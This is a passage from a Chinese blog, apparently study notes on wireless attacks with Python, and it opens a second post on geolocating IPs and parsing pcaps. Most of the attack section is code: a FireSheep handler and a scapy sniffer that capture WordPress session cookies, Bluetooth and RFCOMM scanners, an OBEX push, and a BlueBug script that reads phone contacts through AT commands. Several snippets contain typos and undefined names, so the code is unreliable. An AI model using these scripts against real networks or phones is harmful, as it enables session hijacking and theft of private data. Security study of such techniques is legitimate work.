<p>一款叫火绵羊（FireSheep）的工具，提供了一个简单的双击界面，可以远程接管 Facebook、Twitter、谷歌和其他大量社交媒介中毫无戒心的用户帐户。火绵羊工具会被动地监听无线网卡上由这些 Web 站点提供的 cookie。如果用户连接了不安全的无线网络，也没有使用诸如 HTTPS 之类的服务端控制措施来保护它的会话，火绵羊就会截获这些 cookie 供攻击者再次使用它们。</p>

<p>如果想截取特定会话中的 cookie，供重放的话，也有一个易用的接口方便编写定制的处理代码。下面这段处理代码是针对 Wordpress 的 Cookie 的</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">register</span><span class="p">({</span>
  <span class="na">name</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Wordpress</span><span class="dl">"</span><span class="p">,</span>
  <span class="na">matchPacket</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">packet</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="nx">varcookieName</span> <span class="k">in</span> <span class="nx">packet</span><span class="p">.</span><span class="nx">coookies</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">if</span> <span class="p">(</span><span class="nx">cookieName</span><span class="p">.</span><span class="nx">match0</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="kc">true</span><span class="p">;</span>
      <span class="p">}</span>
    <span class="p">}</span>
  <span class="p">},</span>
  
  <span class="na">processPacket</span><span class="p">:</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
    <span class="k">this</span><span class="p">.</span><span class="nx">siteUrl</span> <span class="o">+=</span> <span class="dl">"</span><span class="s2">wp-admin/</span><span class="dl">"</span>
    <span class="k">for</span> <span class="p">(</span><span class="nx">varcookieName</span> <span class="k">in</span> <span class="k">this</span><span class="p">.</span><span class="nx">firstPacket</span><span class="p">.</span><span class="nx">cookies</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">if</span> <span class="p">(</span><span class="nx">cookieName</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/^wordpress_</span><span class="se">[</span><span class="sr">0-9a-fA-F</span><span class="se">]{32}</span><span class="sr">$/</span><span class="p">))</span> <span class="p">{</span>
        <span class="k">this</span><span class="p">.</span><span class="nx">sessionId</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">firstPacket</span><span class="p">.</span><span class="nx">cookies</span><span class="p">[</span><span class="nx">cookieName</span><span class="p">];</span>
        <span class="k">break</span><span class="p">;</span>
      <span class="p">}</span>
    <span class="p">}</span>
  <span class="p">},</span>
    
  <span class="na">identifyUser</span><span class="p">:</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
    <span class="kd">var</span> <span class="nx">resp</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">httpGet</span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">siteUrl</span><span class="p">);</span>
    <span class="k">this</span><span class="p">.</span><span class="nx">userName</span> <span class="o">=</span> <span class="nx">resp</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">querySelectorAll</span><span class="p">(</span><span class="dl">"</span><span class="s2">#user_info a</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nx">textContent</span><span class="p">;</span>
    <span class="k">this</span><span class="p">.</span><span class="nx">siteName</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Wordpress (</span><span class="dl">"</span> <span class="o">+</span> <span class="k">this</span><span class="p">.</span><span class="nx">firstPacket</span><span class="p">.</span><span class="nx">host</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">)</span><span class="dl">"</span><span class="p">;</span>
  <span class="p">}</span>
<span class="p">});</span>
</code></pre></div></div>

<h3 id="理解-wordpress-的会话-cookies">理解 WordPress 的会话 cookies</h3>

<p>攻击者在火狐 3.6.24 上运行 Firesheep 工具包，可以发现一些类似的字符串通过无线网络以不加密的方式被发送出来。</p>

<h3 id="牧羊人找出-wordpress-cookie-重放攻击">牧羊人——找出 Wordpress Cookie 重放攻击</h3>

<p>编写一个 Python 脚本解析含有这些会话 cookie 的 Wordpress HTTP 会话。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span>
<span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">fire_catcher</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
    <span class="n">r</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"wordpress_[0-9a-fA-F]{32}"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">r</span> <span class="ow">and</span> <span class="s">"Set"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">raw</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"{}&gt;{} Cookie: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">src</span><span class="p">,</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">dst</span><span class="p">,</span> <span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
<span class="n">conf</span><span class="p">.</span><span class="n">iface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="n">sniff</span><span class="p">(</span><span class="nb">filter</span><span class="o">=</span><span class="s">"tcp port 80"</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">fire_catcher</span><span class="p">)</span>
</code></pre></div></div>

<p>为了找出使用火绵羊的黑客，要确认的是攻击者在不同的 IP 地址上重复使用这些 cookie 值。为了检测出这一情况，要修改之前的脚本。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">cookie_table</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">def</span> <span class="nf">fire_catcher</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
    <span class="n">r</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"wordpress_[0-9a-fA-F]{32}"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">r</span> <span class="ow">and</span> <span class="s">"Set"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">raw</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">cookie_table</span><span class="p">.</span><span class="n">keys</span><span class="p">():</span>
            <span class="n">cookie_table</span><span class="p">[</span><span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">]]</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">src</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected and indexed cookie."</span><span class="p">)</span>
        <span class="k">elif</span> <span class="n">cookie_table</span><span class="p">[</span><span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">]]</span> <span class="o">!=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">src</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] Detected Conflict for {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"Victim = {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">cookie_table</span><span class="p">[</span><span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">]]))</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"Attacker = {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">src</span><span class="p">))</span>
            
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="p">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="s">"usage %prog -i&lt;interface&gt;"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-i"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"interface"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"string"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify interface to listen on"</span><span class="p">)</span>
    <span class="n">options</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">options</span><span class="p">.</span><span class="n">interface</span> <span class="o">==</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">parser</span><span class="p">.</span><span class="n">usage</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">conf</span><span class="p">.</span><span class="n">iface</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">interface</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">sniff</span><span class="p">(</span><span class="nb">filter</span><span class="o">=</span><span class="s">"tcp port 80"</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">fire_catcher</span><span class="p">)</span>
    <span class="k">except</span> <span class="nb">KeyboardInterrupt</span><span class="p">:</span>
        <span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="用-python-搜寻蓝牙">用 Python 搜寻蓝牙</h3>

<p>为了能与蓝牙资源进行交互操作，需要 PyBluez 这个 Python 模块。该模块扩展了用于使用蓝牙资源的 Bluez 库的功能。注意，当调用 <code class="language-plaintext highlighter-rouge">discover_devices()</code> 之后就会把附近所有当前处于“可被发现”状态下的蓝牙设备的 MAC 地址放在一个列表中返回来。<code class="language-plaintext highlighter-rouge">lookup_name()</code> 可以将各个蓝牙设备的 MAC 地址转换成方便阅读的字符串。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">bluetooth</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">dev_list</span> <span class="o">=</span> <span class="n">discover_devices</span><span class="p">()</span>
<span class="k">for</span> <span class="n">device</span> <span class="ow">in</span> <span class="n">dev_list</span><span class="p">:</span>
    <span class="n">name</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">lookup_name</span><span class="p">(</span><span class="n">device</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found Bluetooth Device {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">name</span><span class="p">)))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] MAC address: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">device</span><span class="p">)))</span>
</code></pre></div></div>

<p>创建一个无限循环来检测：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">time</span>
<span class="kn">from</span> <span class="nn">bluetooth</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">already_found</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">find_devs</span><span class="p">():</span>
    <span class="n">found_devs</span> <span class="o">=</span> <span class="n">discover_devices</span><span class="p">(</span><span class="n">lookup_names</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">addr</span><span class="p">,</span> <span class="n">name</span> <span class="ow">in</span> <span class="n">found_devs</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">addr</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">already_found</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] Found Bluetooth Device: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">name</span><span class="p">))</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] MAC address: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">addr</span><span class="p">))</span>
            <span class="n">already_found</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span>
            
<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
    <span class="n">find_devs</span><span class="p">()</span>
    <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="截取无限流量查找隐藏的蓝牙设备地址">截取无限流量，查找（隐藏的）蓝牙设备地址</h3>

<p>在 iPhone 里，把无线网卡的 MAC 地址加 1，就得到了这台 iPhone 的蓝牙 MAC。由于 802.11 无线协议在第 2 层中没有使用能够保护 MAC 地址的措施，所以可以很方便地嗅探到它，然后使用该信息来计算蓝牙的 MAC 地址。</p>

<p>来设置一个嗅探无线网卡的 MAC 地址。注意，只要 MAC 地址的前三个十六进制数 MAC 地址的前三个八位字节的 MAC 地址。前三个十六进制数是一个 OUI（Organizational Unique Identifier，组织唯一标识符），它表示的是设备制造商，你可以查询 OUI 数据库获取进一步的信息。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">wifi_print</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">iPhone_OUI</span> <span class="o">=</span> <span class="s">"d0:23:db"</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11</span><span class="p">):</span>
        <span class="n">wifi_mac</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11</span><span class="p">).</span><span class="n">addr2</span>
        <span class="k">if</span> <span class="n">iPhone_OUI</span> <span class="o">==</span> <span class="n">wifi_mac</span><span class="p">[:</span><span class="mi">8</span><span class="p">]:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] Detected iPhone MAC: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">wifi_mac</span><span class="p">))</span>
<span class="n">conf</span><span class="p">.</span><span class="n">iface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="n">sniff</span><span class="p">(</span><span class="n">prn</span><span class="o">=</span><span class="n">wifi_print</span><span class="p">)</span>
</code></pre></div></div>

<p>有了 MAC 地址后，攻击者就可以发起一个设备名称查询来确认这个设备是否真的存在。即便是在“不可被发现”模式下，蓝牙设备仍会响应设备名称的查询请求。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">check_bluetooth</span><span class="p">(</span><span class="n">bt_addr</span><span class="p">):</span>
    <span class="n">bt_name</span> <span class="o">=</span> <span class="n">lookup_name</span><span class="p">(</span><span class="n">bt_addr</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">bt_name</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected Bluetooth Device: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">bt_name</span><span class="p">))</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Failed to Detect Bluetooth Device."</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="扫描蓝牙-rfcomm-信道">扫描蓝牙 RFCOMM 信道</h3>

<p>2004 年的 CeBIT 峰会上，H 和 L 演示了一个他们称为 BlueBug 的蓝牙漏洞（Herfurt，2004）。该漏洞针对的是蓝牙的 RFCOMM 传输协议。RFCOMM 通过蓝牙 L2CAP 协议模拟了 RS232 串行端口。从本质上讲，这会与另一台设备建立一个蓝牙连接，模拟一条普通的串行线缆，使用户能够（在另一台设备上）通过蓝牙打电话、发送短信、读取手机电话簿中的记录，以及转接电话或上网</p>

<p>虽然 RFCOMM 确实也能建立需要认证的加密连接，但厂商有时会忽略掉这一功能，允许（其他）未经认证的用户与设备建立连接。</p>

<p>下面将编写一个扫描器，找出允许未经认证建立 RFCOMM 通道的设备</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">bluetooth</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">rf_comm_con</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">port</span><span class="p">):</span>
    <span class="n">sock</span> <span class="o">=</span> <span class="n">BluetoothSocket</span><span class="p">(</span><span class="n">RFCOMM</span><span class="p">)</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">sock</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">addr</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span> 
		<span class="k">print</span><span class="p">(</span><span class="s">"[+] RFCOMM Port {} open"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">port</span><span class="p">))</span>
        <span class="n">sock</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] RFCOMM Port {} closed"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">port</span><span class="p">))</span>
<span class="k">for</span> <span class="n">port</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">30</span><span class="p">):</span>
    <span class="n">rf_comm_con</span><span class="p">(</span><span class="s">"00:16:38:DE:AD:11"</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span>
</code></pre></div></div>

<p>通过这个脚本可以扫描出开放的 RFCOMM 端口，但不能判断这些端口提供的都是什么服务。需要使用蓝牙服务发现协议（Bluetooth Service Discovery Protocol）来实现</p>

<h3 id="使用蓝牙服务发现协议">使用蓝牙服务发现协议</h3>

<p>蓝牙服务发现协议（Service Discovery Protocol，SDP）提供了一种简便方法，用于描述和枚举蓝牙配置文件的类型以及设备提供的服务。设备的 SDP 配置文件中描述了运行在各个蓝牙协议和端口上的服务。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">bluetooth</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">sdp_browse</span><span class="p">(</span><span class="n">addr</span><span class="p">):</span>
    <span class="n">services</span> <span class="o">=</span> <span class="n">find_service</span><span class="p">(</span><span class="n">address</span><span class="o">=</span><span class="n">addr</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">service</span> <span class="ow">in</span> <span class="n">services</span><span class="p">:</span>
        <span class="n">name</span> <span class="o">=</span> <span class="n">service</span><span class="p">[</span><span class="s">"name"</span><span class="p">]</span>
        <span class="n">proto</span> <span class="o">=</span> <span class="n">service</span><span class="p">[</span><span class="s">"protocol"</span><span class="p">]</span>
        <span class="n">port</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">service</span><span class="p">[</span><span class="s">"port"</span><span class="p">])</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found {} on {}:{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">proto</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
<span class="n">sdp_browse</span><span class="p">(</span><span class="s">"00:16:38:DE:AD:11"</span><span class="p">)</span>
</code></pre></div></div>

<p>调用函数 <code class="language-plaintext highlighter-rouge">find_service()</code> 之后返回 record 数组，目标蓝牙设备上的每个服务都对应数组中的一个 record，每个 record 中记录了主机、名称、描述、提供者（provider）、协议、端口、服务类、配置文件和服务 ID。</p>

<p>对象交换（Object Exchange，OBEX）服务允许我们能像使用匿名 FTP 那样匿名地向一个系统中上传（push）和下载（pull）文件</p>

<h3 id="用-python-obexftp-控制打印机">用 Python ObexFTP 控制打印机</h3>

<p>用 ObexFTP 连接到打印机并上传一个图像文件</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">obexftp</span>
<span class="k">try</span><span class="p">:</span>
    <span class="n">bt_printer</span> <span class="o">=</span> <span class="n">obexftp</span><span class="p">.</span><span class="n">client</span><span class="p">(</span><span class="n">obexftp</span><span class="p">.</span><span class="n">BLUETOOTH</span><span class="p">)</span>
    <span class="n">bt_printer</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="s">"00:16:38:DE:AD:11"</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>
    <span class="n">bt_printer</span><span class="p">.</span><span class="n">put_file</span><span class="p">(</span><span class="s">"/tmp/ninja.jpg"</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Printed Ninja Image."</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[-] Failed to print Ninja Image."</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="用-python-利用手机中的-bluebug-漏洞">用 Python 利用手机中的 BlueBug 漏洞</h3>

<p>BlueBug 会与手机建立一个不需要经过认证的不安全连接，并通过这一连接窃取手机中的信息或直接向手机发送命令。这种攻击通过 RFCOMM 信道发送 AT 命令的方式，远程控制设备。这使得攻击者能读/发短信息、收集个人信息，或强制拨打电话号码。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">bluetooth</span>
<span class="n">target_phone</span> <span class="o">=</span> <span class="s">"AA:BB:CC:DD:EE:FF"</span>
<span class="n">port</span> <span class="o">=</span> <span class="mi">17</span>
<span class="n">phone_sock</span> <span class="o">=</span> <span class="n">bluetooth</span><span class="p">.</span><span class="n">BluetoothSocket</span><span class="p">(</span><span class="n">bluetooth</span><span class="p">.</span><span class="n">RFCOMM</span><span class="p">)</span>
<span class="n">phone_sock</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target_phone</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
<span class="k">for</span> <span class="n">contact</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">5</span><span class="p">):</span>
    <span class="n">at_cmd</span> <span class="o">=</span> <span class="s">"AT+CPBR={}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">contact</span><span class="p">)</span>
    <span class="n">phone_sock</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">at_cmd</span><span class="p">)</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">client_sock</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] {}: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">contact</span><span class="p">,</span> <span class="n">result</span><span class="p">))</span>
<span class="n">sock</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
</code></pre></div></div>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="cybersecurity" /><category term="wireless network" /><summary type="html"><![CDATA[用 Python 进行无线网络攻击]]></summary></entry><entry><title type="html">Analyzing Network Traffic with Python</title><link href="https://crabin.github.io/posts/2024/09/Analyzing%20Network%20Traffic%20with%20Python/" rel="alternate" type="text/html" title="Analyzing Network Traffic with Python" /><published>2024-09-10T00:00:00+00:00</published><updated>2024-09-10T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2024/09/Analyzing%20Network%20Traffic%20with%20Python</id><content type="html" xml:base="https://crabin.github.io/posts/2024/09/Analyzing%20Network%20Traffic%20with%20Python/"><![CDATA[<h2 id="用-python-分析网络流量">用 Python 分析网络流量</h2>

<h2 id="ip-流量将何去何从用-python-回答">IP 流量将何去何从？——用 Python 回答</h2>

<p>把一个网际协议地址（IP 地址）和它所在的物理地址关联起来，可以用 MaxMind 公司提供的一个可以免费获取的开源数据库 GeoLiteCity。有了这个数据库，就可以把 IP 地址与对应的国家、邮政编码、国家名称以及常规经纬度坐标关联起来。</p>

<h3 id="使用-pygeoip-关联-ip-地址和物理位置">使用 PyGeoIP 关联 IP 地址和物理位置</h3>

<p>Jennifer Ennis 编写了一个查询 GeoLiteCity 数据库的纯 Python 库——pygeoip。城市（city）、区域名称（<code class="language-plaintext highlighter-rouge">region_name</code>）、邮政编码（<code class="language-plaintext highlighter-rouge">postal_code</code>）、国名（<code class="language-plaintext highlighter-rouge">country_name</code>）、经纬度以及其他识别信息的记录</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pygeoip</span>
<span class="n">gi</span> <span class="o">=</span> <span class="n">pygeoip</span><span class="p">.</span><span class="n">GeoIP</span><span class="p">(</span><span class="s">"/opt/GetIP/Geo.dat"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">print_record</span><span class="p">(</span><span class="n">target</span><span class="p">):</span>
    <span class="n">rec</span> <span class="o">=</span> <span class="n">gi</span><span class="p">.</span><span class="n">recory_by_name</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
    <span class="n">city</span> <span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"city"</span><span class="p">]</span>
    <span class="n">region</span> <span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"region_name"</span><span class="p">]</span>
    <span class="n">country</span> <span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"country_name"</span><span class="p">]</span>
    <span class="nb">long</span> <span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"longitude"</span><span class="p">]</span>
    <span class="n">lat</span> <span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"latitude"</span><span class="p">]</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] Target: {} Geo-located."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] {}, {}, {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">city</span><span class="p">,</span> <span class="n">region</span><span class="p">,</span> <span class="n">country</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Latitude: {}, Longitude: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">lat</span><span class="p">,</span> <span class="nb">long</span><span class="p">))</span>
<span class="n">target</span> <span class="o">=</span> <span class="s">"173.255.226.98"</span>
<span class="n">print_record</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="使用-dpkt-解析包">使用 Dpkt 解析包</h3>

<p>Dpkt 允许逐个分析抓包文件里的各个数据包，并检查数据包中的每个协议层。也可以使用 pypcap 分析当前的实时流量。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">dpkt</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="k">def</span> <span class="nf">print_pcap</span><span class="p">(</span><span class="n">pcap</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">ts</span><span class="p">,</span> <span class="n">buf</span> <span class="ow">in</span> <span class="n">pcap</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">eth</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">ethernet</span><span class="p">.</span><span class="n">Ethernet</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
            <span class="n">ip</span> <span class="o">=</span> <span class="n">eth</span><span class="p">.</span><span class="n">data</span>
            <span class="n">src</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">src</span><span class="p">)</span>
            <span class="n">dst</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">dst</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Src: {} --&gt; Dst: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">))</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="k">pass</span>
        
